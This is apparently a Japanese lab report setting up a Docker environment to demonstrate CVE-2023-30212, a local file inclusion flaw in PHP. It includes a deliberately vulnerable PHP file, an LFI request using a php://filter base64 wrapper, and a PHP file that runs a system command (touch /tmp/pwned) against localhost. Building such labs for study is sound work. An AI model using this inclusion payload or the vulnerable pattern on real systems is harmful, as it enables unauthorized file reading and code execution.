
Dockerを使用したCVE-2023-30212のPoC
Dockerを使用したCVE-2023-30212のPoC
このレポートは、Vulhubに存在しないCVE-2023-30212の脆弱性を対象に、Dockerベースの脆弱なWeb環境を直接構築し、PoCを通じて当該脆弱性を実証した内容をまとめたものです。
php:8.1-apache/var/www/htmlディレクトリにvulnerable.phpとmalicious.phpをコピー8088ポートで外部アクセス可能
| ファイル名 | 説明 |
|---|---|
vulnerable.php | LFI脆弱性が存在するPHPファイル |
malicious.php | システムコマンドを実行する悪意のあるPHPファイル |
docker-compose.yml |
docker-compose up -d
コンテナ名: cve-2023-30212-cve-lfi-1
Apacheサーバーが起動し、http://localhost:8088でアクセス可能
http://localhost:8088/vulnerable.php?file=php://filter/convert.base64-encode/resource=malicious.php
出力結果をデコードすると、以下のPHPコードが確認されます:
<?php system("touch /tmp/pwned"); ?>
http://localhost:8088/malicious.php
コマンド実行後、/tmp/pwnedファイルが作成されている必要があります。
docker exec -it cve-2023-30212-cve-lfi-1 ls /tmp
結果にpwnedファイルが存在すれば成功です。
| コンテナ構成のための設定ファイル |
Dockerfile | Dockerイメージ生成のための設定ファイル |